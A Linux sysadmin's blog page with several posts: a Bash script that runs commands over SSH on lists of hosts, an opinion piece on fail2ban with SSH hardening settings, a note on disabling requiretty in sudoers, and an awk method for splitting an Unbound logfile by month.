Feuerfest

Just the private blog of a Linux sysadmin

Little helper scripts - Part 2: automation.sh / automation2.sh

Part 1 of this series is here: Little helper scripts - Part 1: no-screenlock-during-meeting.ps1 or use the following tag-link: https://admin.brennt.net/tag/littlehelperscripts

This script is no rocket science. Nothing spectacular. But the number of hours it saved me in various projects is astonishing.

The sad reality

There are far too many companies (even IT-focused companies!) out there that have a very low level of automation. Virtual machines are created by hand - not by some script using an API. Configurations are not deployed via some Configuration Management software like Puppet/OpenVox/Chef/Ansible or a Runbook automation software like Rundeck - no, they are handcrafted. Bespoke. System administration like it's 1753. With all the implications and drawbacks that brings.

Containerisation? Yeah.. Well.. "A few docker containers here and there but nobody in the company really knows how that stuff works so we leave it alone" is a phrase I have heard more than a few times. Either directly, or reported from colleagues working in other companies.

This means that I have to log on to systems manually and execute commands by hand. Something I can do and do regularly in my home lab. But to do it for dozens or even hundreds of systems? Yeah... No. Sorry, I've got better things to do. And as an external consultant, the client always keeps an eye on my performance metrics. After all, they are paying my employer a lot of money for my services. Sitting there all day and getting paid to copy and paste commands? It doesn't look good on my performance reporting spreadsheet and it doesn't meet my personal standards of what a consultant should be able to deliver.

I'm just a guest

What's more, because of my work as a consultant, I'm just an external contractor. I come in for a few months to solve a problem or help with a task, and then I move on to the next project at another company. That means I can't just do everything the way I want. I can't just go and install software on all the systems, even though I've been given root privileges. I can't just implement Ansible. I have to design my solutions so that they survive and continue to work when I'm gone. Sure, I can introduce dozens of new technologies and whole new technology stacks. I'm sure my employer would love to have the follow-on support contracts for those constructs. But going it alone will seriously damage the customer relationship. Especially with the IT people. After all, they'll be the ones stuck with new technology they don't understand and will have to spend time learning and familiarising themselves with. And I have been a sysadmin long enough to know what they will think of me if I start pulling such stunts.

Of course I can suggest changes. I can push for standardisation and automation. But for most customers, that will make no difference. After all, there are reasons why a company has stopped keeping up with technology. And fixing this takes time and usually involves a complete change of the dominating mindset. Something I cannot achieve as a lone consultant.

Scripting to the rescue!

First I went with the cheap & easy solution of for server in hosta hostb hostc; do ssh user@$server "command --some-parameter bla"; done but I grew tired of writing it all completely anew for each task.

Naturally, systems are often grouped into categories (webservers, etc.) or perform the same tasks (think of clusters). Hence commands must be executed on the same set of hosts again and again. One of my colleagues had already compiled lists of hostnames grouped by tasks, roles and installed software, as some systems had the same software installed but were just configured to do different tasks with that software.

Through these lists I got an idea: Why not feed those into a for or do-while loop and be done?
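As a rough sketch of that idea (not the final script), assuming a plain text file with one hostname per line: the function name run_on_hosts and the RUNNER variable are made up for illustration, and skipping blank lines and #-comments is an assumption about the list format.

```shell
#!/bin/bash
# Minimal sketch: run one command on every host listed in a file.
# run_on_hosts and RUNNER are hypothetical names, not part of automation2.sh.
run_on_hosts() {
  local hostlist="$1" cmd="$2" runner="${RUNNER:-ssh}" host
  while IFS= read -r host; do
    # Assumption: blank lines and lines starting with # are not hostnames
    [[ -z "$host" || "$host" == \#* ]] && continue
    # Redirect STDIN so the remote command cannot swallow the rest of the host list
    "$runner" "$host" "$cmd" < /dev/null
  done < "$hostlist"
}
```

Called as run_on_hosts webservers.list "uptime" it would connect to each host in turn. Setting RUNNER=echo turns it into a dry run that only prints what would be executed.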

In the end I added some safety & DNS checks and named the script automation.sh. Later I added the capability to log the output on each host and named the script automation2.sh, which can be viewed below.

Yes, it's just a glorified nesting of if-statements but the amount of time this script saved me is insane. And as it utilizes only basic Posix & Bash commands I've yet to find a system where it can't be executed.

As always: Please check my GitHub for the most recent version as I won't update the script shown in this article.

#!/bin/bash
# vim: set tabstop=2 smarttab shiftwidth=2 softtabstop=2 expandtab foldmethod=syntax :
#
# Small script to automate custom shell command execution
# Current version can be found here:
# https://github.com/ChrLau/scripts/blob/master/automation2.sh

# Bash strict mode
#  read: http://redsymbol.net/articles/unofficial-bash-strict-mode/
set -euo pipefail
IFS=$'\n\t'

# Set pipefail variable
# As we use "ssh command | tee" and tee will always succeed our check for non-zero exit-codes doesn't work
#
# The exit status of a pipeline is the exit status of the last command in the pipeline,
#  unless the pipefail option is enabled (see: The Set Builtin).
# If pipefail is enabled, the pipeline's return status is the value of the last (rightmost)
#  command to exit with a non-zero status, or zero if all commands exit successfully.

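VERSION="1.6"
SCRIPT="$(basename "$0")"
# "|| true" keeps "set -e" from ending the script here, so the checks below can print a proper message
SSH="$(command -v ssh || true)"
TEE="$(command -v tee || true)"
# Defaults for all option variables, as "set -u" aborts on unset variables
HOSTLIST=""
COMMAND=""
SSH_USER=""
ABORT=""
SUDO=""
SSH_PARAMS=""
LOGFILE=""
# Colored output
RED="\e[31m"
GREEN="\e[32m"
ENDCOLOR="\e[0m"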

# Test if ssh is present and executable
if [ ! -x "$SSH" ]; then
  echo -e "${RED}This script requires ssh to connect to the servers. Exiting.${ENDCOLOR}"
  exit 2;
fi

# Test if tee is present and executable
if [ ! -x "$TEE" ]; then
  echo -e "${RED}tee not found.${ENDCOLOR} ${GREEN}Script can still be used,${ENDCOLOR} ${RED}but option -w CAN NOT be used.${ENDCOLOR}"
fi

function HELP {
  echo "$SCRIPT $VERSION: Execute custom shell commands on lists of hosts"
  echo "Usage: $SCRIPT -l /path/to/host.list -c \"command\" [-u <user>] [-a <YES|NO>] [-r] [-s \"options\"] [-w \"/path/to/logfile.log\"]"
  echo ""
  echo "Parameters:"
  echo " -l   Path to the hostlist file, 1 host per line"
  echo " -c   The command to execute. Needs to be in double-quotes. Else getopts interprets it as separate arguments"
  echo " -u   (Optional) The user used during SSH-Connection. (Default: \$USER)"
  echo " -a   (Optional) Abort when the ssh-command fails? Use YES or NO (Default: YES)"
  echo " -r   (Optional) When given command will be executed via 'sudo su -c'"
  echo " -s   (Optional) Any SSH parameters you want to specify. Needs to be in double-quotes. (Default: empty)"
  echo "                 Example: -s \"-i /home/user/.ssh/id_user\""
  echo " -w   (Optional) Write STDERR and STDOUT to logfile (on the machine where $SCRIPT is executed)"
  echo ""
  echo "No arguments or -h will print this help."
  exit 0;
}

# Print help if no arguments are given
if [ "$#" -eq 0 ]; then
  HELP
fi

# Parse arguments
while getopts ":l:c:u:a:hrs:w:" OPTION; do
  case "$OPTION" in
    l)
      HOSTLIST="${OPTARG}"
      ;;
    c)
      COMMAND="${OPTARG}"
      ;;
    u)
      SSH_USER="${OPTARG}"
      ;;
    a)
      ABORT="${OPTARG}"
      ;;
    r)
      SUDO="YES"
      ;;
    s)
      SSH_PARAMS="${OPTARG}"
      ;;
    w)
      LOGFILE="${OPTARG}"
      ;;
    h)
      HELP
      ;;
    *)
      HELP
      ;;
# Not needed as we use : as starting char in getopts string
#    :)
#      echo "Missing argument"
#      ;;
#    \?)
#      echo "Invalid option"
#      exit 1
#      ;;
  esac
done

# Give usage message if one of the mandatory arguments is missing
if [ -z "$HOSTLIST" ] || [ -z "$COMMAND" ]; then
  echo "You need to specify -l and -c. Exiting."
  exit 1;
fi

# Check if username was provided, if not use $USER environment variable
if [ -z "$SSH_USER" ]; then
  SSH_USER="$USER"
fi

# Check for YES or NO
if [ -z "$ABORT" ]; then
  # If empty, set to YES (default)
  ABORT="YES"
# Check if it's not NO or YES - we want to ensure a definite decision here
elif [ "$ABORT" != "NO" ] && [ "$ABORT" != "YES" ]; then
  echo  "-a accepts either YES or NO (case-sensitive)"
  exit 1
fi

# If variable logfile is not empty
if [ -n "$LOGFILE" ]; then

  # Check if logfile is not present
  if [ ! -e "$LOGFILE" ]; then
    # Check if creating it was unsuccessful
    if ! touch "$LOGFILE"; then
      echo -e "${RED}Could not create logfile at $LOGFILE. Aborting. Please check permissions.${ENDCOLOR}"
      exit 1
    fi
  # When logfile is present..
  else
    # Check if it's writeable and abort when not
    if [ ! -w "$LOGFILE" ]; then
      echo -e "${RED}$LOGFILE is NOT writeable. Aborting. Please check permissions.${ENDCOLOR}"
      exit 1
    fi
  fi
fi

# Execute command via sudo or not?
if [ "$SUDO" = "YES" ]; then
  COMMANDPART="sudo su -c '${COMMAND}'"
else
  COMMANDPART="${COMMAND}"
fi

# Check if hostlist is readable
if [ -r "$HOSTLIST" ]; then
  # Check that hostlist is not 0 bytes
  if [ -s "$HOSTLIST" ]; then
  
    # Split the -s string into separate ssh arguments (arguments containing spaces are not supported)
    #  IFS is limited to newline and tab above, so the string is not split on spaces automatically
    SSH_ARGS=()
    if [ -n "${SSH_PARAMS:-}" ]; then
      IFS=' ' read -r -a SSH_ARGS <<< "$SSH_PARAMS"
    fi

    while IFS= read -r HOST
    do

      # getent returns exit code of 2 if a hostname isn't resolving
      #  Checked directly in the if-statement, as "set -e" would end the script before a separate $? test
      if ! getent hosts "$HOST" &> /dev/null; then
        echo -e "${RED}Host: $HOST is not resolving. Typo? Aborting.${ENDCOLOR}"
        exit 2
      fi

      # Log STDERR and STDOUT to $LOGFILE if specified
      if [ -n "${LOGFILE:-}" ]; then
        echo -e "${GREEN}Connecting to $HOST ...${ENDCOLOR}" 2>&1 | tee -a "$LOGFILE"

        # Test if ssh-command was successful (pipefail passes the ssh exit code through tee)
        if ! ssh -n -o ConnectTimeout=10 ${SSH_ARGS[@]+"${SSH_ARGS[@]}"} "$SSH_USER"@"$HOST" "${COMMANDPART}" 2>&1 | tee -a "$LOGFILE"; then
          echo -n -e "${RED}Command was NOT successful on $HOST ... ${ENDCOLOR}" 2>&1 | tee -a "$LOGFILE"

          # Shall we proceed or not?
          if [ "$ABORT" = "YES" ]; then
            echo -n -e "${RED}Aborting.${ENDCOLOR}\n" 2>&1 | tee -a "$LOGFILE"
            exit 1
          else
            echo -n -e "${GREEN}Proceeding, as configured.${ENDCOLOR}\n" 2>&1 | tee -a "$LOGFILE"
          fi
        fi

      else

        echo -e "${GREEN}Connecting to $HOST ...${ENDCOLOR}"

        # Test if ssh-command was successful
        if ! ssh -n -o ConnectTimeout=10 ${SSH_ARGS[@]+"${SSH_ARGS[@]}"} "$SSH_USER"@"$HOST" "${COMMANDPART}"; then
          echo -n -e "${RED}Command was NOT successful on $HOST ... ${ENDCOLOR}"

          # Shall we proceed or not?
          if [ "$ABORT" = "YES" ]; then
            echo -n -e "${RED}Aborting.${ENDCOLOR}\n"
            exit 1
          else
            echo -n -e "${GREEN}Proceeding, as configured.${ENDCOLOR}\n"
          fi
        fi

      fi

    done < "$HOSTLIST"

  else
    echo -e "${RED}Hostlist \"$HOSTLIST\" is empty. Exiting.${ENDCOLOR}"
    exit 1
  fi

else
  echo -e "${RED}Hostlist \"$HOSTLIST\" is not readable. Exiting.${ENDCOLOR}"
  exit 1
fi

Opinion: fail2ban doesn't increase system security, it's just a mere logfile cleanup tool

Like many IT people, I pay to have my own server for personal projects and self-hosting. As such, I am responsible for securing these systems as they are, of course, connected to the internet and provide services to everyone. Like this blog for example. So I often read about people installing Fail2Ban to "increase the security of their systems".

And every time I read this, I am like this popular meme from the TV series Firefly:

I don't share this view of Fail2Ban - in fact, I'm against the view that it improves security - but I keep quiet, knowing that starting this discussion is simply not helpful. Nor is it wanted.

For me, Fail2Ban is just a log cleanup tool. Its only benefit is that it will catch repeated login attempts and deny them by adding firewall rules to iptables/nftables to block traffic from the offending IPs. This prevents hundreds or thousands of extra logfile lines about unsuccessful login attempts. So it doesn't improve the security of a system, as it doesn't prevent unauthorised access or strengthen authorisation or authentication methods. No, Fail2Ban - by design - can only act when an IP has been seen enough times to trigger an action from Fail2Ban.

With enough luck on the part of the attacker - or negligence on the part of the operator - a login will still succeed. Fail2Ban won't save you if you allow root to login via SSH with the password "root" or "admin" or "toor".

Granted, even Fail2Ban knows this and they write this prominently on their project's GitHub page:

Though Fail2Ban is able to reduce the rate of incorrect authentication attempts, it cannot eliminate the risk presented by weak authentication. Set up services to use only two factor, or public/private authentication mechanisms if you really want to protect services.

Source: https://github.com/fail2ban/fail2ban

Yet, the number of people I see installing Fail2Ban to "improve SSH security" but refusing to use public/private key authentication is staggering.

I only allow public/private key login for select non-root users specified via AllowUsers. Absolutely no password logins allowed. I've changed the SSH port away from port 22/tcp and I don't run Fail2Ban, as with this setup there are not that many login attempts anyway. And those that do happen tend to abort pretty early on when they realise that password authentication is disabled.

Although in all honesty: Thanks to services like https://www.shodan.io/ and others, finding out the changed SSH port is not a problem. There are dozens of tools that can detect what is running behind a port and act accordingly. Therefore I do see my fair share of SSH bruteforce attempts. Denying password authentication is the real game changer.

So do yourself a favour: Don't rely on Fail2Ban for SSH security. Rely on the following points instead:

  • Keep your system up to date! As this will also remove outdated/broken ciphers and add support for new, more secure ones. All the added & improved SSH security gives you nothing if an attacker can gain root privileges via another vulnerability.
  • AllowUsers or AllowGroups: To allow only specified users to log in via SSH. This is generally preferred over using DenyUsers or DenyGroups as it's generally wiser to specify "what is allowed" than to specify "what is forbidden". As the bad guys are pretty damn good at finding the flaws and holes in the latter.
  • DenyUsers or DenyGroups: Based on your groups this may be useful too but I try to avoid using this.
  • AuthorizedKeysFile /etc/ssh/authorized_keys/%u: This will place the authorized_keys file for each user in the /etc/ssh/authorized_keys/ directory. This ensures users can't add public keys by themselves. Only root can.
  • PermitEmptyPasswords no: Should be self-explanatory. Is already a default.
  • PasswordAuthentication no and PubkeyAuthentication yes: Disables authentication via password. Enables authentication via public/private keys.
  • AuthenticationMethods publickey: To only offer publickey authentication. Normally there is publickey,password or the like.
  • PermitRootLogin no: Create a non-root account and use su. Or install sudo and use that if needed. See also AllowUsers.
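
To check whether a given configuration file actually contains these settings, something like the following could be used. It is only a naive sketch: check_sshd_option is a hypothetical helper, it looks at a single file and ignores Include directives and Match blocks. The effective configuration is better taken from sshd -T (run as root).

```shell
#!/bin/bash
# Naive sketch: report whether an sshd_config-style file sets KEY to the wanted VALUE.
# check_sshd_option is a hypothetical helper. It ignores Include and Match blocks.
check_sshd_option() {
  local file="$1" key="$2" want="$3" have
  # sshd uses the first value it finds for a keyword, so stop at the first match
  have="$(awk -v k="$key" 'tolower($1) == tolower(k) { print tolower($2); exit }' "$file")"
  if [ "$have" = "$want" ]; then
    echo "OK:   $key $want"
  else
    echo "WARN: $key is '${have:-unset}', wanted '$want'"
    return 1
  fi
}
```

A call such as check_sshd_option /etc/ssh/sshd_config PasswordAuthentication no prints an OK or WARN line and returns a non-zero exit code on a mismatch, so it can be chained in a small audit script.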

Why I prefer !requiretty over "ssh -t"

Dall-E https://admin.brennt.net/bl-content/uploads/pages/dad5b98ab9f04a2cdca5de3afe2f6b0e/dall-e_sudo.jpg

Claudio Künzler, whom I know briefly from working with him on enhancing his check_equallogic back in 2010, wrote an article over at Geeker's Digest on How to use sudo inside SSH command. Of course he mentions the ssh -t parameter, as without it, we would get the following error message when calling sudo: (Example shamelessly stolen from his article. 😇)

ck@linux:~$ ssh targetserver "sudo whoami"
sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper
sudo: a password is required

And ssh -t is the right call here. Well, to be fair: It's not the only solution and in my eyes even not the best solution.

No, I am not talking about piping the password into the command prompt, which is so often recommended as a solution (it's not!) that it makes me sad.

I am talking about the usage of negating requiretty in the /etc/sudoers file or a file under /etc/sudoers.d/ respectively.

Let's take the /etc/sudoers.d/icinga2 file I use in my article How to monitor your APT-repositories with Icinga:

Here I must use NOPASSWD for all executed commands and monitoring plugins as well as the line Defaults:icinga2 !requiretty. This negates the need for a tty for the icinga2 user completely. Omitting either the NOPASSWD or the !requiretty will give us the error message we see above.

root@admin:~ # cat /etc/sudoers.d/icinga2
# This line disables the need for a tty for sudo
#  else we will get all kind of "sudo: a password is required" errors
Defaults:icinga2 !requiretty

# sudo rights for Icinga2
icinga2  ALL=(ALL) NOPASSWD: /usr/bin/unattended-upgrades
icinga2  ALL=(ALL) NOPASSWD: /usr/bin/unattended-upgrade
icinga2  ALL=(ALL) NOPASSWD: /usr/bin/apt-get
icinga2  ALL=(ALL) NOPASSWD: /usr/lib/nagios/plugins/check_apt

It's also possible to just negate requiretty based on the path to the binary. As mentioned in this StackExchange question: How to disable requiretty for a single command in sudoers?
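
A per-command variant could look roughly like the sketch below. The binary path is just one of the entries from the sudoers file above, used as an example. The snippet is written to a scratch file and, if visudo is available, syntax-checked without touching /etc/sudoers.

```shell
#!/bin/bash
# Sketch: write a per-command requiretty override to a scratch file and syntax-check it.
# The path of the binary is only an example taken from the sudoers file above.
SNIPPET="$(mktemp)"
cat > "$SNIPPET" <<'EOF'
# Disable the tty requirement only for this one binary
Defaults!/usr/lib/nagios/plugins/check_apt !requiretty
EOF

# visudo -c only checks the syntax, -f points it at the scratch file instead of /etc/sudoers
if command -v visudo > /dev/null 2>&1; then
  visudo -c -f "$SNIPPET" || echo "visudo reported a problem" >&2
fi
```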

However keep in mind that the ordering of lines in a sudoers file is important! Quoting man sudoers from the SUDOERS FILE FORMAT section:

When multiple entries match for a user, they are applied in order. Where there are multiple matches, the last match is used (which is not necessarily the most specific match).

Why not just use ssh -t?

Personally I prefer the configuration/setting of sudo-related parameters in an /etc/sudoers.d/ file. My reasons are:

When properly configured via a sudoers file it doesn't matter if a command is called via ssh, ssh -t or any other way. This enhances operational stability and makes it easier for users, as they don't have to remember adding the -t parameter.

And it, at least, serves as some form of documentation that this user/binary is called from another script/host/etc., giving you a clue what these sudo rights are needed/used for.


Howto properly split all logfile content based on timestamps - and realizing my own fallacy

Photo by Mikhail Nilov: https://www.pexels.com/photo/person-in-black-hoodie-using-a-computer-6963061/

I use a Pi-hole for DNS based AdBlocking in my home network. Additionally I installed Unbound as recursive DNS resolver on it. Meaning: I can use the RaspberryPi in my network at home as the DNS server for all my devices. This way I don't have to use the DNS-Servers of my ISP, granting me some additional privacy. Additionally I can see which DNS queries are sent by each device. Leading to surprising revelations.

However recently my internet connection was interrupted and afterwards I noticed that I couldn't access any site or services where I used a domain or hostname to connect to. And while the problem itself (dnsmasq: Maximum number of concurrent DNS queries reached (max: 150)) was fixed easily with a simple restart of the unbound service, I noticed that the /var/log/unbound/unbound.log logfile was uncompressed, unrotated and 3.3 gigabyte in size. Whoops. That happens when no logrotate job is present.

Side gig: A logrotate config for Unbound

Fixing this issue was rather easy. A short search additionally revealed that unbound-control has a log_reopen option which is a good idea to trigger after the logrotate. This way Unbound properly closes old filehandles and uses the new logfile.

root@pihole:~# cat /etc/logrotate.d/unbound
/var/log/unbound/unbound.log {
        monthly
        missingok
        rotate 12
        compress
        delaycompress
        notifempty
        sharedscripts
        create 644
        postrotate
                /usr/sbin/unbound-control log_reopen
        endscript
}

But wait, there is more

However I had it on my list to dig deeper into the dnsmasq: Maximum number of concurrent DNS queries reached (max: 150) error in order to better understand the whole construct of Pi-hole, dnsmasq and Unbound.

However, the logfile was way too big to work with conveniently. 49,184,687 lines are just too many. Especially on a RaspberryPi with its, in comparison, limited CPU power. Now I could have just split it up after n lines using split -l number-of-lines but:

  • That is too easy and
  • I have run into the need for a script which splits logfile lines based on a range of timestamps more often recently

How to properly split a logfile - and overcomplicating stuff

Most of the unbound logfile lines will have the Unix timestamp in brackets, followed by the process name, the log level the message belongs to and the actual message.

root@pihole:~# head -n 1 /var/log/unbound/unbound.log
[1700653509] unbound[499:0] debug: module config: "subnetcache validator iterator"

However some multi-line messages won't follow this format:

[1700798246] unbound[1506:0] info: incoming scrubbed packet: ;; ->>HEADER<<- opcode: QUERY, rcode: NOERROR, id: 0
;; flags: qr aa ; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
chat.cdn.whatsapp.net.  IN      A

;; ANSWER SECTION:
chat.cdn.whatsapp.net.  60      IN      A       157.240.252.61

;; AUTHORITY SECTION:

;; ADDITIONAL SECTION:
;; MSG SIZE  rcvd: 55

[1700798246] unbound[1506:0] debug: iter_handle processing q with state QUERY RESPONSE STATE

This means we need the following technical approach:

  1. Generate the Unix-timestamp for the first day in a month at 00:00:00 o'clock
    • Alternatively formulated: The Unix-timestamp for the first second of a month
  2. Generate the Unix-timestamp for the last day of the month at 23:59:59 o'clock
    • The last second of a month
  3. Find the first occurrence of the timestamp from point 1
  4. Find the last occurrence of the timestamp from point 2
  5. Use sed to move the lines for each month into a separate logfile

I will however also show an awk command on how to filter based on the timestamps, useful for logfiles where every line is prefixed with a timestamp.

Calculating with date

Luckily date is powerful and easy to use for date calculations. %s gives us the Unix timestamp. We do not need to specify hours:minutes:seconds as date automatically takes 00:00:00 for these values. Automatically giving us the first second of a day. And date also takes care of leap years and possibly a lot of other nuisances when it comes to time and date calculations.

To get the last second of a month we simply take the first day of the month, add a month and subtract one second. It can't be easier.

# Unix timestamp for the first second in a month
user@host:~$ date -d "$(date +%Y/%m/01)" "+%Y/%m/%d %X - %s"
2024/11/01 00:00:00 - 1730415600

# Unix timestamp for the last second in a month
user@host:~$ date -d "$(date +%Y/%m/01) + 1 month - 1 second" "+%Y/%m/%d %X - %s"
2024/11/30 23:59:59 - 1733007599

To verify the value we can use this for-loop. It will give us all the date and timestamps we need to confirm that our commands are correct.

user@host:~$ for YEAR in {2023..2024}; do for MONTH in {1..12}; do echo -n "$(date -d "$(date +$YEAR/$MONTH/01)" "+%Y/%m/%d %X - %s")  "; date -d "$(date +$YEAR/$MONTH/01) + 1 month - 1 second" "+%Y/%m/%d %X - %s"; done; done
2023/01/01 00:00:00 - 1672527600  2023/01/31 23:59:59 - 1675205999
2023/02/01 00:00:00 - 1675206000  2023/02/28 23:59:59 - 1677625199
2023/03/01 00:00:00 - 1677625200  2023/03/31 23:59:59 - 1680299999
2023/04/01 00:00:00 - 1680300000  2023/04/30 23:59:59 - 1682891999
2023/05/01 00:00:00 - 1682892000  2023/05/31 23:59:59 - 1685570399
2023/06/01 00:00:00 - 1685570400  2023/06/30 23:59:59 - 1688162399
2023/07/01 00:00:00 - 1688162400  2023/07/31 23:59:59 - 1690840799
2023/08/01 00:00:00 - 1690840800  2023/08/31 23:59:59 - 1693519199
2023/09/01 00:00:00 - 1693519200  2023/09/30 23:59:59 - 1696111199
2023/10/01 00:00:00 - 1696111200  2023/10/31 23:59:59 - 1698793199
2023/11/01 00:00:00 - 1698793200  2023/11/30 23:59:59 - 1701385199
2023/12/01 00:00:00 - 1701385200  2023/12/31 23:59:59 - 1704063599
2024/01/01 00:00:00 - 1704063600  2024/01/31 23:59:59 - 1706741999
2024/02/01 00:00:00 - 1706742000  2024/02/29 23:59:59 - 1709247599
2024/03/01 00:00:00 - 1709247600  2024/03/31 23:59:59 - 1711922399
2024/04/01 00:00:00 - 1711922400  2024/04/30 23:59:59 - 1714514399
2024/05/01 00:00:00 - 1714514400  2024/05/31 23:59:59 - 1717192799
2024/06/01 00:00:00 - 1717192800  2024/06/30 23:59:59 - 1719784799
2024/07/01 00:00:00 - 1719784800  2024/07/31 23:59:59 - 1722463199
2024/08/01 00:00:00 - 1722463200  2024/08/31 23:59:59 - 1725141599
2024/09/01 00:00:00 - 1725141600  2024/09/30 23:59:59 - 1727733599
2024/10/01 00:00:00 - 1727733600  2024/10/31 23:59:59 - 1730415599
2024/11/01 00:00:00 - 1730415600  2024/11/30 23:59:59 - 1733007599
2024/12/01 00:00:00 - 1733007600  2024/12/31 23:59:59 - 1735685999

To verify we can do the reverse (Unix timestamp to date) with the following command:

user@host:~$ date -d @1698793200
Wed  1 Nov 00:00:00 CET 2023

Solution solely working on timestamps

As the logfile timestamp is enclosed in brackets we need to tell awk to treat either [ or ] as a field separator. Then we can use awk to check if the second field is in a given time frame. For the first test run we define the variables manually in our shell and adjust the date commands to only output the Unix timestamp.

And as the logfile starts in November 2023 I set the values accordingly. awk then conveniently puts all lines whose timestamp is between these two values into a separate logfile.

user@host:~$ YEAR=2023
user@host:~$ MONTH=11
user@host:~$ FIRST_SECOND=$(date -d "$(date +$YEAR/$MONTH/01)" "+%s")
user@host:~$ LAST_SECOND=$(date -d "$(date +$YEAR/$MONTH/01) + 1 month - 1 second" "+%s")
user@host:~$ awk -F'[\\[\\]]' -v MIN=${FIRST_SECOND} -v MAX=${LAST_SECOND} '{if($2 >= MIN && $2 <= MAX) print}' /var/log/unbound/unbound.log >> /var/log/unbound/unbound-$YEAR-$MONTH.log
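
To see what the field separator and the comparison do, the filter can be tried on a few sample lines first. This is only a sketch: filter_by_timestamp is a hypothetical wrapper name, and the sample lines are taken from the log excerpts above. Note how the continuation line without a timestamp is silently dropped, as its second field is empty.

```shell
#!/bin/bash
# Sketch: print only lines whose bracketed Unix timestamp lies between MIN and MAX.
# filter_by_timestamp is a hypothetical name; it reads the log from STDIN.
filter_by_timestamp() {
  # Same separator as in the command above: either [ or ] splits the fields,
  #  so $2 is the timestamp of a line starting with [timestamp]
  awk -F'[\\[\\]]' -v MIN="$1" -v MAX="$2" '$2 >= MIN && $2 <= MAX'
}

# First and last second of November 2023 (values from the table above)
printf '%s\n' \
  '[1700653509] unbound[499:0] debug: module config: "subnetcache validator iterator"' \
  ';; QUESTION SECTION:' \
  '[1700798246] unbound[1506:0] debug: iter_handle processing q with state QUERY RESPONSE STATE' |
  filter_by_timestamp 1698793200 1701385199
```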

And this would already work fine if every line started with the timestamp. As this is not the case we need to add a bit more logic.

So the resulting script would look like this:

user@host:~$ cat date-split.sh
#!/bin/bash
# vim: set tabstop=2 smarttab shiftwidth=2 softtabstop=2 expandtab foldmethod=syntax :

# Split a logfile based on timestamps

LOGFILE="/var/log/unbound/unbound.log"
AWK="$(command -v awk)"
GZIP="$(command -v gzip)"

for YEAR in {2023..2024}; do
  for MONTH in {1..12}; do

    # Logfile starts November 2023 and ends November 2024 - don't grep for values before/after that time window
    if  [[ "$YEAR" -eq 2023 && "$MONTH" -gt 10 ]] ||  [[ "$YEAR" -eq 2024 && "$MONTH" -lt 12 ]]; then

      # Debug
      echo "$YEAR/$MONTH"

      # Calculate first and last second of each month
      FIRST_SECOND="$(date -d "$(date +"$YEAR"/"$MONTH"/01)" "+%s")"
      LAST_SECOND="$(date -d "$(date +"$YEAR"/"$MONTH"/01) + 1 month - 1 second" "+%s")"

      # Split logfiles solely based on timestamps
      #  awk gets both values via -v, so no export is needed
      OUTFILE="$(dirname "$LOGFILE")/unbound-$YEAR-$MONTH.log"
      "$AWK" -F'[\\[\\]]' -v MIN="${FIRST_SECOND}" -v MAX="${LAST_SECOND}" '{if($2 >= MIN && $2 <= MAX) print}' "$LOGFILE" >> "$OUTFILE"

      # Creating all those separate logfiles will probably fill up our diskspace
      #  therefore we gzip them immediately afterwards
      "$GZIP" "$OUTFILE"

    fi

  done;
done

However, this script is vastly over-engineered. Why? Read on.

StackOverflow to the rescue

I still had the problem with the multi-line log messages. At first I wanted to use grep to get the matching first and last line numbers with head and tail. But uh.. Yeah, I had a fallacy here. As this still wouldn't have worked with multi-line log messages without a timestamp. Also using grep like this is highly inefficient. While it would be fine for a one-time usage script I still hit a road block.

I just wasn't able to get awk to do what I wanted and I resorted to asking my question on StackOverflow. Better to get input from others than to waste a lot of time.

awk to the rescue

It was only through the answer that I realized that my solution was a bit over-engineered. Why use date if you can use strftime to calculate the year and month from the timestamp directly? The initial answer was:

awk '
$1 ~ /^\[[0-9]+]$/ {
  f = "unbound-" strftime("%m-%Y", substr($1, 2, length($1)-2)) ".log"
  if (f != prev) close(f); prev = f
}
{
  print > f
}' unbound.log

How this works has been explained in detail on StackOverflow, so I just copy & paste it here.

For each line which first field is a [timestamp] (that is, matches regexp ^\[[0-9]+]$), we use substr and length to extract timestamp, strftime to convert it to a mm-YYYY string and assign "unbound-mm-YYYY.log" to variable f. In the second block, that applies to all lines, we print the current line in file f. Note: contrary to shell redirections, in awk, print > FILE appends to FILE.

Edit: as suggested by Ed Morton closing each file when we are done with it should significantly improve the performance if the total number of files is large. if (f != prev) close(f); prev = f added. Ed also noted that escaping the final ] in the regex is useless (and undefined behavior per POSIX). Backslash removed.

And this worked flawlessly. The generated monthly logfiles from my testfile matched exactly the line-numbers per month. Even multi-line log messages and empty lines were included.

All I then did was add gzip to compress the files directly before the next file is created. Just to prevent filling up the disk completely. Additionally I changed the filename from unbound-MM-YYYY.log to unbound-YYYY-MM.log. Yes, the logfile name won't work with logrotate. But I just need it to properly dig through the files and the Year-Month naming will be of great help here. Afterwards I don't need them anymore and will delete them. So this was none of my concern.

This was my new working solution:

awk '$1 ~ /^\[[0-9]+]$/ {
  f = "unbound-" strftime("%Y-%m", substr($1, 2, length($1)-2)) ".log"
  if (f != prev) {
    if (prev) system("gzip " prev)
    close(prev)
    prev = f
  }
}
{
  print > f
}
END {
  if (prev) system("gzip " prev)
}' unbound.log

No bash script with convoluted logic needed. And easily usable for other logfiles too. Just adapt the starting regular expression to match the one the logfile uses and adapt the logic for strftime so the proper timestamp can be created.
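
As an illustration of such an adaptation, here is a sketch for a different, assumed log format where every entry starts with an ISO date like 2024-11-05. In that case strftime isn't even needed, as year and month can be cut straight out of the first field. The function name split_by_month and the app- filename prefix are made up for this example.

```shell
#!/bin/bash
# Sketch: split a logfile into monthly files, for entries starting with an ISO date.
# split_by_month and the "app-" prefix are hypothetical; output goes to the current directory.
split_by_month() {
  awk '
  $1 ~ /^[0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9]/ {
    f = "app-" substr($1, 1, 7) ".log"   # YYYY-MM taken straight from the date string
    if (f != prev) {
      if (prev != "") close(prev)        # done with the previous month
      prev = f
    }
  }
  f != "" { print > f }                  # lines without a date follow the last date seen
  ' "$1"
}
```

Running split_by_month app.log would create files like app-2024-10.log and app-2024-11.log. Lines before the very first dated entry are skipped, as there is no month to assign them to.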

Sometimes it's better to ask other people. 😄


Why basics matter

Photo by George Becker: https://www.pexels.com/photo/1-1-3-text-on-black-chalkboard-374918/

Someone on the Internet asked on Reddit what this CronJob does, as it looked strange.

